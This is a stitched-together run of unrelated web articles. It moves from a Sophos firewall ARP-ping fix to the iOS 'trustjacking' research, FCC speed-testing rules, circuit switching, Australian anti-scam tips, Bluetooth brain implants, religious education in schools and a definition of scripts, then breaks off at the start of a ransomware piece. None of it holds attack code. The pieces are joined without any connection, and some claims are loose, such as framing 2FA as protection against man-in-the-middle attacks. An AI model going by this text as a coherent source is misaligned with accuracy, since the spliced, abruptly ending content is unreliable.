When changing a firewall configuration, it can happen in rare cases that some alias IP addresses no longer respond to ICMP requests (ping), while other alias addresses remain pingable. This phenomenon occurs particularly frequently if the MAC address of the firewall changes as a result of the migration.
A typical configuration in modern networks includes multiple alias IP addresses on a single WAN interface. These alias addresses are often used to manage different services from a single physical interface. When changing firewalls, e.g. from another manufacturer to a Sophos Firewall or even when changing a hardware model within the Sophos ecosystem, the MAC address of the external interface often changes. This change can lead to problems in the ARP table (Address Resolution Protocol) of neighboring routers or switches, which assign the alias IP addresses to the old MAC addresses and do not update them automatically.
The technology behind the problem
The ARP protocol is responsible for resolving IP addresses into MAC addresses. When a host wants to contact an IP address in the network, it sends an ARP request to determine the associated MAC address. The ARP cache stores these assignments temporarily to reduce the network load and speed up the resolution. However, if the MAC address of a firewall changes while the IP address remains the same, conflicts may arise as neighboring devices may still try to associate the IP addresses with the old MAC address.
In such a situation, it is possible that some IP addresses are still pingable while others do not respond. This is because the ARP table on the neighboring devices has correctly updated the mapping for certain IP addresses, while it still contains outdated information for other IP addresses.
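This failure mode can be illustrated with a toy model of a neighbor's ARP cache. Everything here (addresses, MACs, the timeout value) is made up for illustration; real ARP caches live in the operating system or switch firmware.

```python
# Toy model of a neighboring router's ARP cache: IP -> (MAC, learned_at).
class ArpCache:
    def __init__(self, timeout=600):
        self.timeout = timeout          # seconds before an entry goes stale
        self.entries = {}               # ip -> (mac, learned_at)

    def learn(self, ip, mac, now):
        # Any ARP packet (request or reply) from ip refreshes the mapping.
        self.entries[ip] = (mac, now)

    def resolve(self, ip, now):
        mac, learned_at = self.entries.get(ip, (None, 0))
        if mac is None or now - learned_at > self.timeout:
            return None                 # would trigger a fresh ARP request
        return mac                      # may still be the OLD firewall's MAC!

cache = ArpCache()
cache.learn("203.0.113.27", "00:11:22:aa:bb:cc", now=0)   # old firewall
# Firewall is replaced: same IP, new MAC. Until the entry expires or an
# ARP packet arrives from the new device, traffic goes to the dead MAC:
print(cache.resolve("203.0.113.27", now=60))              # stale old MAC
cache.learn("203.0.113.27", "00:11:22:dd:ee:ff", now=61)  # ARP ping arrives
print(cache.resolve("203.0.113.27", now=62))              # updated new MAC
```

This is why some alias addresses keep working while others fail: entries that happen to get refreshed resolve correctly, while untouched entries keep pointing at the old hardware until they time out.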
ARP ping to update the ARP table
To resolve this issue, you can run a specific command on the Sophos Firewall via SSH that allows you to perform a manual ARP ping for each alias IP address. This command will force the firewall to initiate an ARP request from the affected alias IP address, which will update the ARP table on the neighboring devices.
system diagnostics utilities arp ping source <Alias-IP-address> interface <Interface-Name> <Destination-IP-address>
Assume that one of the non-pingable alias IP addresses is 203.0.113.27 and it is configured on the interface Port7.27. The command to update the ARP table for this address is:

system diagnostics utilities arp ping source 203.0.113.27 interface Port7.27 203.0.113.27

This command sends an ARP request from the alias IP address 203.0.113.27 to itself via the interface Port7.27. This forces all neighboring devices to update their ARP tables with the correct MAC address for this IP.
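Where many alias addresses are affected, the console command can be templated per address. The small helper below only builds the command strings in the syntax shown above; the address list and interface name are hypothetical, and the commands would still be executed on the firewall's SSH console.

```python
def build_arp_ping_commands(alias_ips, interface):
    """Build one 'arp ping' console command per affected alias IP.

    Source and destination are the same alias address, so the firewall
    ARPs "to itself" and neighbors relearn the new MAC.
    """
    template = ("system diagnostics utilities arp ping "
                "source {ip} interface {iface} {ip}")
    return [template.format(ip=ip, iface=interface) for ip in alias_ips]

# Hypothetical list of non-pingable alias addresses on Port7.27:
for cmd in build_arp_ping_commands(["203.0.113.27", "203.0.113.28"], "Port7.27"):
    print(cmd)
```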
Step-by-step troubleshooting guide:
1. Connect to the Sophos Firewall via SSH: First, establish an SSH connection to the firewall, using a tool such as PuTTY or the integrated SSH console.
2. Identify non-pingable alias IP addresses: Check which alias IP addresses on the WAN interface are not pingable.
3. Execute the ARP ping command: Run the ARP ping command mentioned above for each non-pingable alias IP address, taking care to use the specific alias IP address and the associated interface correctly.
4. Check the results: Verify whether the previously non-pingable alias IP addresses now respond to ping requests.
5. Restart network devices (if necessary): In some cases, it may be helpful to restart adjacent network devices such as routers or switches to ensure that the ARP tables are fully updated.
Have you ever plugged in your iPhone to a USB port and tapped “Trust” on your screen? You might have unknowingly given an attacker permanent access to your device—even wirelessly, and potentially even remotely.
On Wednesday morning at RSA Conference 2018, two security researchers gave a presentation that has massive security and privacy implications for users of all devices that run Apple’s iOS operating system: iPhone, iPad, and iPod touch.
In this article:
- What exactly is the “trustjacking” attack?
- Does the attacker have to be near the victim?
- Remote attack where the user is not near the trusted computer
- Remote attack where the attacker is not near the trusted computer
- What if I never tap Trust when using someone else’s computer? Am I safe?
- Why does iOS have a “Trust This Computer” dialog box?
- Do I need to tap “Trust” to charge my device?
- Are public charging stations safe?
- How can I revoke trust from computers I’ve previously trusted?
- How can I learn more?
What exactly is the “trustjacking” attack?
The security researchers, Adi Sharabani and Roy Iarchy, presented a live demonstration of the attack. Sometime before the presentation, Sharabani had connected his iPhone X to Iarchy’s MacBook and tapped “Trust” in a dialog box on the iPhone—something many people do when they connect their iPhone to a computer.
During the presentation, Sharabani used his iPhone X to take a selfie with Iarchy, after which he sent a text message to their company’s CEO.
On the MacBook, Iarchy issued a command to Sharabani’s iPhone to back up its data over Wi-Fi, which is made possible by an iOS feature called iTunes Wi-Fi Sync, which works on both macOS and Windows hosts. After the synchronization was complete, Iarchy showed that both the selfie and the text message were easily accessible on his MacBook.
The researchers also demonstrated how an attacker could live-stream continuous screenshots from the device, effectively simulating a live video feed of what was on the iPhone’s screen. Given that iOS briefly shows the most recently typed character in password fields, it’s possible for an attacker to watch a victim type their banking or other passwords. This is effectively a clever, modern way to conduct a “shoulder surfing” attack without having to be in the same room as the victim.
Remotely observing iOS is a modern version of shoulder surfing.
One of the most concerning attacks enabled by trustjacking that Sharabani and Iarchy demonstrated was the ability to replace an iOS app with a malicious version that had an identical icon, which appeared in the same location as the original. In their demonstration, it took less than a second for the iPhone’s legitimate Facebook app to get replaced with a repackaged version.
By repackaging an app, an attacker can insert functionality of their choosing, including functions only available via private APIs that Apple doesn’t allow to be used in App Store apps.
Is this the real Facebook app or a maliciously modified version?
Imagine, if you will, a couple of scenarios in which replacing an app with a compromised version could be a serious security and privacy concern.
Many people use secure messaging apps, like Signal, for instance, to transmit messages that only the recipient can decrypt. If an attacker were to replace your iPhone’s secure messaging app with a malicious repackaged version, all of your “secure” messages could be siphoned off and made available for the attacker—before they were ever encrypted in the first place.
It’s also possible for repackaged apps to do things like secretly take pictures of you using your front-facing camera, record audio using your microphone, and more; iOS developer Felix Krause shared examples of similar behavior in October 2017.
Krause shows how a hijacked camera can reveal a user’s emotion.
Does the attacker have to be near the victim?
After an iOS user has trusted a computer, at any time in the future that computer can be used to carry out attacks when the device is either connected via USB, or when the iOS device and the computer are connected to the same Wi-Fi wireless network.
However, remote attacks are also possible.
Remote attack where the user is not near the trusted computer
Sharabani and Iarchy have confirmed that it’s possible to carry out attacks when the iOS device is elsewhere in the world, so long as the iOS device is connected to a VPN of the attacker’s choosing.
This attack scenario requires a combination of trustjacking—the user having once trusted a computer now controlled by the attacker—and what the researchers called a malicious profile attack (which implies that the victim has fallen for a social engineering attack and installed a mobileconfig profile created by the attacker).
Remote attack where the attacker is not near the trusted computer
Sharabani and Iarchy also described an attack scenario in which a legitimately trusted computer—perhaps the victim’s home computer—had become compromised by an attacker. If an attacker can surreptitiously control a compromised computer from a remote location, then the attacker could carry out these attacks from anywhere in the world.

What if I never tap Trust when using someone else’s computer? Am I safe?
Why does iOS have a “Trust This Computer” dialog box?
The first time a computer attempts to access data from your iPhone or other iOS device, you will see a dialog box on your device’s screen, which says, “Trust This Computer? Your settings and data will be accessible from this computer when connected.” The dialog box presents two options: “Trust” and “Don’t Trust.”
The iOS “Trust This Computer?” dialog box
By displaying this prompt, Apple gives iOS users the choice whether the connected computer should be allowed to access the device’s settings and data.
However, the dialog box implies that it’s necessary for there to be a physical connection between the iOS device and the computer via a Lightning to USB cable. Most iOS device users are unaware that “connected” can also mean “on the same Wi-Fi network.”
As of iOS 11, tapping Trust now requires you to enter your device’s unlock passcode. According to Sharabani and Iarchy, Apple implemented this mitigation after the researchers began working with Apple to disclose the vulnerability in July 2017. Even so, many users do not understand the nature or degree of the trusted relationship, and may be trusting computers too freely.
Do I need to tap “Trust” to charge my device?
No! If all you want to do is charge your device’s battery, you should always tap the “Don’t Trust” button, not the “Trust” button. Charging your battery does not require a trusted relationship.
If you decide later that you need to exchange data between your iOS device and a computer you had previously chosen not to trust, simply reconnect your device via USB and you’ll be presented with the “Trust This Computer?” dialog box again.
Are public charging stations safe?
If you ever connect your iPhone to something that doesn’t appear to be a computer, for example a public charging station, you shouldn’t get a “Trust This Computer?” prompt. If you see such a prompt at a public charging kiosk, you may in reality be connected to a hidden computer on the other end—one that’s designed to steal data from connected devices while they’re charging.
The safest solution is to avoid public charging terminals altogether. They can potentially attempt to hack your device, via methods similar to those described in this article. Even a seemingly innocuous-looking cable can potentially try to hijack your device, as discussed in episode 124 of the Intego Mac Podcast (from 20:47 to 22:02). There are other potential non-security concerns as well, such as the possibility of a malfunctioning cable, charger, or electrical outlet that can cause a short and physically damage your device.
How can I revoke trust from computers I’ve previously trusted?
After learning about this attack, you may find yourself trying to remember how many computers you’ve previously trusted when you probably didn’t need to, or that should no longer have a trusted relationship with your iOS device.
Unfortunately, Apple does not offer users a way to see a list of all computers to which they’ve previously connected their iOS device, which means you cannot selectively revoke trust from individual computers.
What you can do instead is to mass-revoke trust from all previously connected computers by going into the Settings app, tapping General, Reset, and then Reset Location & Privacy.
“Reset Location & Privacy” untrusts all previously trusted computers.
Note that this has some temporarily inconvenient side effects; for example, you’ll need to individually reauthorize each and every app to know your location or to use your camera. However, the minor inconvenience is well worth it to protect your security and privacy.
How can I learn more?
Each week on the Intego Mac Podcast, Intego’s Mac security experts discuss the latest Apple news, including security and privacy stories, and offer practical advice on getting the most out of your Apple devices. Be sure to follow the podcast to make sure you don’t miss any episodes.
You can also subscribe to our e-mail newsletter and keep an eye here on The Mac Security Blog for the latest Apple security and privacy news. And don’t forget to follow Intego on your favorite social media channels:
Understanding FCC Compliance for Speed and Latency Testing for ISPs
The realm of internet connectivity is vast, and with the digital age at its peak, consistent and speedy connectivity is no longer a luxury—it’s a necessity. Given the global expanse of the internet, there are varying standards and regulations in place in different regions of the world, which ensure that internet service providers (ISPs) meet the basic speed and latency standards for their services. One such significant body in the U.S. is the Federal Communications Commission (FCC).
FCC Compliance: A Deep Dive
When discussing speed and latency testing in the U.S., the FCC is the foremost regulatory body. Its compliance guidelines, as stipulated by the FCC DA 18-710, are thorough:
ISPs are mandated to conduct a test at least once per minute, which equals 60 tests each hour.
If the consumer load exceeds 64 Kbps downstream, a retest is in order to check for repeated exceedances before moving to the next minute’s test.
A separate download and upload test is required every hour, initiating at the start of the testing hour. Notably, if the consumer load crosses 64 Kbps during download testing or 32 Kbps during upload testing, a retest after a minute is compulsory.
The FCC strongly suggests a continuous check-and-retry procedure to ensure rigorous compliance.
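The per-minute check-and-retry logic above can be sketched in a few lines. This is an illustrative reading of the cadence rules, not an official FCC implementation; measure_load_kbps, run_latency_test, and the retry budget are stand-ins for real measurement code.

```python
DOWNSTREAM_LOAD_LIMIT_KBPS = 64   # downstream threshold cited in DA 18-710

def run_minute_slot(measure_load_kbps, run_latency_test, max_retries=3):
    """Run one minute's latency test, retrying while consumer load is high.

    Returns the test result, or None if the load never dropped below the
    threshold within this minute's retry budget (the next scheduled
    minute then starts fresh).
    """
    for _ in range(max_retries + 1):
        if measure_load_kbps() <= DOWNSTREAM_LOAD_LIMIT_KBPS:
            return run_latency_test()
    return None

# Simulated load readings: busy, busy, then idle -> test runs on 3rd check.
readings = iter([120, 90, 10])
result = run_minute_slot(lambda: next(readings), lambda: "ok")
print(result)  # -> ok
```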
Global Perspectives: Beyond the FCC
While the FCC is pivotal in the U.S., various other regulatory bodies set benchmarks across the world:
UK: Overseen by the Office of Communication (Ofcom), UK ISPs follow a set of guidelines which include the selection of a test panel based on specific criteria, performing daily tests at peak hours, and measuring speeds during the “quiet hour” (when the least network traffic is expected).
Europe: The European Union, being a coalition of multiple member countries, sees a variance in standards. However, the Body of European Regulators of Electronic Communications (BEREC) collaborates with national telecommunications regulatory bodies to enforce overarching EU telecom rules. A significant target of the EU is ensuring all European households have access to at least 100 Mbps in speed.
Australia: The Australian Communications and Media Authority (ACMA) and the Australian Competition & Consumer Commission (ACCC) jointly ensure that ISPs are compliant. They mandate regular speed and connectivity tests and empower consumers to exit contracts if the promised service quality isn’t met.
India: Overseen by the Telecom Regulatory Authority of India (TRAI), ISPs in India are expected to deliver at least 80% of the broadband speed that subscribers have signed up for. Regular testing to meet this standard is crucial.
The Future: Automation in Compliance
Given the intricacy of these regulations and the constant need for adherence, automating the process of speed and latency testing is becoming increasingly popular. Companies like Friendly offer tools tailored for specific regions and countries that help ISPs stay compliant without manual interventions. Using frameworks like TR-143, these tools can generate timely reports, ensuring that ISPs are always on the right side of regulatory standards.
In conclusion, while the standards for speed and latency may vary worldwide, the underlying principle remains consistent: to provide consumers with reliable, fast, and consistent internet connectivity. As the digital landscape continues to evolve, ensuring ISPs remain compliant with bodies like the FCC will be paramount for the overall growth and trust in the digital ecosystem.
Before understanding Circuit Switching, let’s explore the basic types of switching.
Switching is an important mechanism that provides communication between different networks or different computer(s) and manages the data flow between the two end points. There are three types of switching techniques –
- Circuit switching
- Packet switching
- Message switching.
Here we will discuss Circuit switching.
It is a switching method in which a dedicated physical path is formed between two points in a network, i.e. between the sending and the receiving devices. These dedicated paths are created by a set of switches connected by physical links. Circuit switching is the simplest method of data communication: it has a fixed data rate, and both subscribers need to operate at this fixed rate.
Phases Of Circuit switching Communication
It has basically three phases :
Establishment or Setup Phase –
A dedicated circuit or path is established between the sender and receiver before the actual data transfer. End-to-end addressing, i.e. the source address and destination address, is required for creating a connection between the two physical devices.
Data Transfer Phase –
Data transfer only starts after the setup phase is completed and a physical, dedicated path is established. The data flow is continuous, though there may be periods of silence in the transmission. Generally, all internal connections are made in duplex form. The switches use time slots (TDM) or frequency bands (FDM) to route the data from the sender to the receiver, and no addressing is involved during transfer.
TDM (Time Division Multiplexing) and FDM (Frequency Division Multiplexing) are types of multiplexing techniques that are used to transmit multiple signals over a single channel. In FDM, multiple signals are transmitted by occupying different frequency slots while in TDM, the signals get transmitted in multiple time slots.
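The idea behind TDM can be sketched in a few lines: samples from each source are interleaved into fixed, repeating time slots, and the receiver recovers each stream by reading every n-th slot (FDM would instead give each signal its own frequency band). The sample values below are arbitrary.

```python
def tdm_multiplex(sources):
    """Interleave equal-length sample streams into repeating time slots."""
    frame_len = len(sources[0])
    assert all(len(s) == frame_len for s in sources)
    line = []
    for t in range(frame_len):       # one time slot per source, repeated
        for s in sources:
            line.append(s[t])
    return line

def tdm_demultiplex(line, n_sources):
    """Recover each source by picking every n-th slot from the line."""
    return [line[i::n_sources] for i in range(n_sources)]

a, b = ["a0", "a1", "a2"], ["b0", "b1", "b2"]
line = tdm_multiplex([a, b])
print(line)                       # ['a0', 'b0', 'a1', 'b1', 'a2', 'b2']
print(tdm_demultiplex(line, 2))   # [['a0', 'a1', 'a2'], ['b0', 'b1', 'b2']]
```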
Disconnect or Teardown Phase –
When one of the subscribers (either the sender or the receiver) needs to disconnect, a disconnect signal is sent to each switch to release the resource and break/disconnect the connection.
One of the major examples of circuit switching is the Plain Old Telephone System (POTS).
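The three phases map naturally onto a small state machine, sketched below for illustration only; no real telephone signaling protocol is modeled, and all names are arbitrary.

```python
class Circuit:
    """Minimal model of a circuit-switched connection's lifecycle."""

    def __init__(self):
        self.state = "idle"

    def setup(self, src, dst):
        assert self.state == "idle"
        self.src, self.dst = src, dst   # end-to-end addressing happens here
        self.state = "established"      # dedicated path is now reserved

    def transfer(self, data):
        assert self.state == "established", "no data before setup completes"
        return f"{self.src}->{self.dst}: {data}"

    def teardown(self):
        assert self.state == "established"
        self.state = "idle"             # switches release the resources

c = Circuit()
c.setup("A", "B")
print(c.transfer("hello"))   # A->B: hello
c.teardown()
```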
Advantages of Circuit Switching
- The data rate is fixed and dedicated, as the connection is established using a dedicated physical path.
- Once the circuit is established, there is no waiting time and the data transmission delay is negligible.
- Since a dedicated path is established, it is a good choice for continuous transmission over a long duration.
Disadvantages of Circuit Switching
- Since the connection is dedicated it cannot be used for any other data transmission even if the channel is free.
- It is inefficient in terms of utilization of the system resource. As it is allocated for the entire conversation, we can’t use the resource for other connection.
- More bandwidth is required for the dedicated channels.
- Establishing the physical link between sender and receiver takes considerable time before the actual data transfer can begin.
- Is circuit switching faster than packet switching?
  Packet switching is faster than circuit switching. It is also more efficient, since all the bandwidth can be shared at once rather than being reserved for a limited number of connections that may not use it all.
- The Internet uses packet switching, not circuit switching: the Internet is built on IP (Internet Protocol), which is a packet-switched protocol.
- Circuit-switched communication involves three phases: the setup phase, the data transfer phase, and the teardown phase.
- Find the transmission rate of a link that transmits 'f' frames/sec, where each frame has a single slot and each slot holds 'b' bits.
  Since the transmission rate is the amount of data sent per second,
  Transmission rate = f * b bits/sec
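A quick numeric check of the formula, with arbitrarily chosen values:

```python
def transmission_rate(frames_per_sec: int, bits_per_slot: int) -> int:
    """Rate = f * b bits/sec, for one slot of b bits per frame."""
    return frames_per_sec * bits_per_slot

# 1000 frames/sec with 8-bit slots -> 8000 bits/sec
print(transmission_rate(1000, 8))  # 8000
```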
According to Scamwatch, Australian cyber-crime and scams cost us $56 million last year – and despite our best efforts, cyber criminals are getting more sophisticated each and every day.
With a bit of training and knowhow, we can stand up to cyber criminals by protecting ourselves online. This may be achieved through strengthening our passwords, using anti-virus and anti-malware software, using in-built computer or smartphone security, and some other simple tips, as we’ll share below. But what is cybercrime, and how can we all protect ourselves against it?
What is cybercrime?
According to the Australian Federal Police, cybercrime are crimes directed at computers or information communication technology such as hacking systems or denial of service attacks, or crimes where computers or ICTs are integral to the offence, such as sending out malicious or scam emails to gain personal information so criminals can steal your identity.
If it involves breaching a computer or using a computer or digital system (e.g., a smartphone) to commit the crime, this can be considered a cybercrime.
How to protect against Australian cybercrime
In the wake of the September 2022 Optus security breach, where millions of Australians personal information was stolen and potentially sold to scammers and other cyber-criminals, protecting yourself against cybercrime and scams is as important as ever.
With documents such as drivers’ licences and passports among the information stolen, this could potentially expose those affected to a high risk of identity theft.
Ten ways to protect your family against cybercrime – Australia
Here are ten ways to mitigate cybercrime risk by increasing your own personal cybersecurity.
- Nothing left unlocked
Though it may be a pain, if your device or application uses passwords to authenticate usage, you need to set them up immediately. It only takes seconds for a hacker or nefarious actor to access your phone or PC while you’re not looking if you don’t have a password or other authentication method set up.
- Use a password manager
Every single application, website, and device you use should have its own password that changes regularly (every three months or so.) These should be strong (combinations of letters, numbers, symbols, and other characters) so they are not easily cracked by hackers using sophisticated cracking rigs. A password manager such as LastPass, DashLane, or KeePass can help you keep track of passwords across your devices, remind you to update passwords, and keep your master list of passwords encrypted so there’s an added layer of protection if your files fall into the wrong hands.
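Strong random passwords of the kind a password manager produces are straightforward to generate with Python's standard secrets module. The length and symbol set below are arbitrary choices for illustration, not a recommendation from any particular manager.

```python
import secrets
import string

def generate_password(length: int = 16) -> str:
    """Generate a cryptographically strong random password."""
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*-_=+"
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())   # e.g. 'q7N!vR2_pX9c+Kd3'
```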
- Use two-factor authentication
Two-factor authentication (2FA) is another layer of protection to prevent “man in the middle” attacks – you not only need a password to get into a site or application, but you’ll also need a special One-Time Password (OTP) generated by an Authenticator app (Google Authenticator or Microsoft Authenticator) or sent to you via SMS or email. These 2FA OTPs (yes, lots of acronyms in cybersecurity!) are time limited – and most good sites or apps will alert you to breach attempts by sending you an OTP when you haven’t requested one.
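The time-limited OTPs produced by authenticator apps are typically standard TOTP codes (RFC 6238), built on the HOTP construction from RFC 4226. A minimal sketch:

```python
import hashlib
import hmac
import struct
import time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HOTP (RFC 4226): HMAC-SHA1 of a counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, period: int = 30, digits: int = 6) -> str:
    """TOTP (RFC 6238): HOTP over the current 30-second time step."""
    return hotp(secret, int(time.time()) // period, digits)

# RFC 4226 test secret; counter 0 yields the published vector 755224.
print(hotp(b"12345678901234567890", 0))   # 755224
```

Because the counter is derived from the clock, a code is only valid for one short time window, which is what makes an intercepted OTP nearly useless moments later.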
- Automatically update your software
Out of date anti-virus software is about as useful as a flywire door on a submarine. You need to keep all your software up to date – not because you’re missing out on new functionality, but because developers patch up exploits and vulnerabilities – or update definitions of malware and viruses so they can catch new variants that may be circulating in the “wild.” Set your software to automatically update so you aren’t caught out. Don’t have AV software installed on your devices already? Buy some.
Also check with your smartphone manufacturer if they are still supporting your handset with regular security patches. If not, it may be time to upgrade.
- Monitor your accounts
Having alerts for transactions or unusual activity can help you see if criminal third parties have access to your accounts – real-time transaction alerts on your phone can show you if people are using your credit cards, online payment systems, or bank account or not, and give you extra piece of mind when you’re out shopping so you know where your money is going. You should also request paper copies of bills and transaction reports from time to time to ensure you aren’t caught out.
- Know how scams work
There are many resources out there alerting you and others to the latest scams – scam operations are not some random dodgy guys trying their luck – they are sophisticated organised criminal businesses using cutting-edge technology. Payment redirection scams cost Australian business $227 million in the last year alone – a 77% increase over 2020. Subscribing to ScamWatch or other fraud protection sites that track these scams means you’ll be wise to new scams as they arise.
- Hone your BS detector
If you think it’s a scam, it probably is. Some scams are so authentic looking it can even confuse industry veterans. “Spear phishing” which uses social engineering using public (or stolen) information to glean more information from you can look very convincing. If you’re unsure, ask a trusted friend or colleague or report the email or SMS (or communication) to ScamWatch. YouTube videos produced by dedicated “scambaiters” are also a fun and informative way to keep on top of how scams work (Kitboga and Jim Browning are highly recommended.)
- Sign up to identity protection or breach lists
Identity protection services can help monitor if your personal information has been breached or stolen. The “Have I Been Pwned” service is free and alerts you to mentions of your email address in lists of compromised passwords or other breached personal information. Credit reporting bureaux such as Equifax or Experian also offer paid services that alert you if your credit score or history has changed so you can nip any potential identity theft in the bud before it gets too far. Remember: you can access your credit history for free every three months.
- Watch for warning signs
If you are receiving unauthorised 2FA attempts or emails asking, “is this you trying to login?” – update your passwords immediately. Do not click links in out-of-the-blue “change your password” emails, even if they look legitimate. Sudden loss of cellular network service in a usually high-service area is also a warning sign your identity is being stolen. Always check with your provider if you suspect something isn’t right – it’s better to be safe than sorry.
- Freeze your credit report
Did you know you can request a ban on others accessing your credit report for at least 21 days? This stops criminals from applying for or checking your credit while the freeze is active. Lenders or banks will also need your express written permission to access your report – otherwise they cannot approve the application. This may be essential if you have strong suspicion your identity has been stolen – or you have evidence your identity has been used in criminal activities already.
Community efforts to protect against cyber-crime Australia
Savvy CEO Bill Tsouvalas says the community can help protect against Australian cyber-crime, especially assisting vulnerable people such as seniors and new migrants who may struggle with English. “Some people who get legitimate-looking texts or emails from their bank saying their account is under threat will click without a second thought, especially if they’re not computer literate or have trouble with English.
“It’s up to those of us with IT skills to bring culturally and linguistically diverse communities together to inform one another of new scams, even if they seem obvious to you and others such as myself who interact with financial technology every day. Greater awareness of scams and cyber fraud is as effective as anti-malware and strong passwords. It all begins with us.”
Bluetooth Implants: A Threat to User Privacy?
Whether it is Fitbit, Apple, Samsung, or Garmin, new wearable Bluetooth technology devices are constantly joining the market. Tracking everything from step count, distance traveled, and heart rate, even a basic cardiogram has been built into wearables as capabilities have advanced. As a result, it has become more convenient for people to track more of their routines such as diet and exercise since wearables communicate directly with apps on their phones, tablets, and computers. The advances have also made it easier to share this data with family, friends and, more importantly, their physicians to set goals for improving one’s health.
After years of development and finally gaining FDA approval for human clinical trials, there is a new technology that may soon take center stage. Neuralink has developed what it is calling Telepathy, a cybernetic implant that works with Brain-Computer Interface (BCI) to relay thoughts. The first human subject received the implant on January 28th, 2024.
Aside from the fact that it is an implant versus a wearable, what makes this device so different is the intended function. While wearables often track physiology, this implant is designed to allow someone to control devices such as their computer or phone by simply thinking about it. The intent of this product’s development is to improve quality of life, specifically for those with paralysis such as quadriplegics.
Once implanted, neural activity is transmitted from the chip via Bluetooth to the BCI which will then translate the signal to an action for the end device. That action could be as simple as dialing the phone or as complex as controlling a robotic limb. Among the long-term goals for the program are restoring eyesight and full mobility.
These capabilities stem from noble intent, but just like with any other emerging technologies, the risks to privacy and security remain to be seen. Though a hacker would have to be much closer to gain control of a Bluetooth signal, it is possible. Depending on the type of Bluetooth hack, the results could include loss of connection between the implant and the BCI (Bluejacking), collection of personal data from the device (Bluesnarfing), or complete access similar to wiretapping a phone (Bluebugging).
As the Bluetooth signal in this case will be transmitting someone’s thoughts, there could be other concerns with regards to privacy and perhaps exploitation at the risk of disclosing embarrassing thoughts. Even more frightening would be a scenario in which thoughts or ideas can be transmitted into the brain which are then carried out as actions through the implant. Therefore, security protocols will need to be hardened and the user will have to be extra vigilant to limit potential intrusions, especially since there is currently not as much focus on Bluetooth security.
Rethinking religious education in public schools
There needs to be an overhaul of religious education programs in public schools, according to a Monash University expert.
Many government schools provide religious classes in the form of church-based ‘Religious Instruction’. These types of classes segregate students into faith-based groups in which they receive instruction in the beliefs and practices of one religion.
However, this form of religious education has become increasingly controversial, resulting in numerous government reviews, laws and policy changes. In particular, there is a concern that religious instruction of this manner can indoctrinate students by encouraging them to uncritically accept beliefs that are not well supported by evidence or beliefs that are controversial. This is particularly problematic in a ‘post-truth world’ that is flooded with disinformation, conspiracy thinking, science denialism and extremist thinking.
Religious instruction should be replaced by religion classes that foster social cohesion and intercultural understanding, according to Dr Jennifer Bleazby, Senior Lecturer in the School of Education Culture and Society at Monash University.
Bleazby also argues that educational efforts to combat ‘post-truth’ thinking can only be achieved with an alternative method to teaching religion.
“Education aims to foster reflective and critical thinking, intellectual virtues, an awareness of cognitive biases and the capacity for collaborative inquiry. It is counterproductive and hypocritical for schools to claim they actively discourage post-truth phenomena if they are simultaneously running religious instruction programs that aim to indoctrinate and risk encouraging the very types of thinking associated with the post-truth world,” she said.
In a recently published research paper, Bleazby calls for education leaders, policymakers and legislators to seriously re-evaluate the place of religious education in government schools.
“Not all approaches to religious education are problematic. Classes aimed at ‘General Religious Education’ or worldviews education can foster religious literacy, intercultural understanding and positive attitudes towards minorities, and also combat extremism. This approach to religious education can help to alleviate social divisions, social alienation and the extremism associated with post-truth problems.
“Since current state laws already permit this sort of religious education to be taught within the regular school curriculum, unlike Religious Instruction, it can readily be taught by qualified teachers employed in schools, not representatives of religious organisations,” Bleazby said.
As there are no federal laws regulating religious education in government schools, each of Australia’s six states and two major territories has its own laws and policies, all of which distinguish between these two types of religious education. ‘General Religious Education’ has not been controversial in Australia, and it can be expanded and incorporated into the official school curriculum.
Many parents also have concerns over the religious education their children are currently receiving in public schools.
A Queensland parent and spokesperson for lobby group Queensland Parents for Secular State Schools, Alison Courtice, is leading the charge in Queensland to have “teachers not preachers” guide religious education in state schools.
“In Queensland we are now in the 113th year of churches having legal right of entry to public school classrooms. It's time to close the school gates and say no to allowing our schools to be mission fields,” Courtice said.
Graham Macpherson, spokesperson for Fairness in Religions in School (FIRIS), fully supports these comments and proposals.
“Religious education, particularly in NSW Government schools, is problematic for the reasons Dr Bleazby gives. It also is increasingly becoming an administrative and logistical challenge for schools, with fewer and fewer students participating in Special Religious Education (SRE) or Special Education in Ethics (SEE) classes.
“The demand for SRE classes is merely supplier-led. It’s not due to student demand, nor is it student focused from an educational point of view. In 2023, religious instruction in government schools, such as SRE, is both ethically and philosophically wrong,” Macpherson said.
Bleazby concludes that given the growing problem and seriousness of post-truth phenomena, it is time to seriously re-evaluate the place of religious instruction in schools, which risks fostering the uncritical acceptance of beliefs and misinformation, and instead focus on developing and implementing religious education programs that foster social cohesion and intercultural inquiry.
What Is a Script?
A script is a program written in a scripting language, such as JScript or VBScript. Alternative scripting languages include Rexx, Python, and Perl. Compared to programming languages such as C++ and Visual Basic, scripting languages are better suited to creating short applications that provide quick solutions to small problems.
In many cases, scripts are used to automate manual tasks, much like a macro. Scripts are well suited for:
Manipulating the Windows environment
Running other programs
Automating logon procedures
Sending key sequences to an application
For example, if you have several similar tasks, you can write one generalized script that can handle all of them.
You can write scripts that start an action in response to an event. You can write scripts that keep a running tally of events and trigger some action only when certain criteria are met.
Scripts are useful for nonrepetitive tasks as well. If a task requires you to do many things in sequence, you can turn that sequence of tasks into just one task by scripting it.
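To make the "sequence of tasks becomes one task" idea concrete, here is a small sketch in Python (one of the alternative scripting languages mentioned above). It renames a folder's stray report files to a uniform scheme and then archives them, collapsing two manual chores into one command. The file names and folder layout are illustrative assumptions.

```python
import zipfile
from pathlib import Path

def tidy_reports(folder: Path) -> Path:
    """Rename stray .txt reports to a uniform scheme, then zip them up."""
    renamed = []
    for i, report in enumerate(sorted(folder.glob("*.txt")), start=1):
        target = folder / f"report_{i:03d}.txt"
        report.rename(target)
        renamed.append(target)

    # Bundle the renamed reports into a single archive in the same folder.
    archive = folder / "reports.zip"
    with zipfile.ZipFile(archive, "w") as zf:
        for path in renamed:
            zf.write(path, arcname=path.name)
    return archive
```

Run it against any folder of `.txt` files; scheduling it (for example with Task Scheduler or cron) turns the whole cleanup into a zero-touch task.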
Ransomware prevention refers to the measures taken to protect computer systems and networks from ransomware attacks.
Ransomware is a type of malware that encrypts files on a victim's computer and demands payment in exchange for the decryption key. It is a growing threat to individuals, businesses, and organizations worldwide.
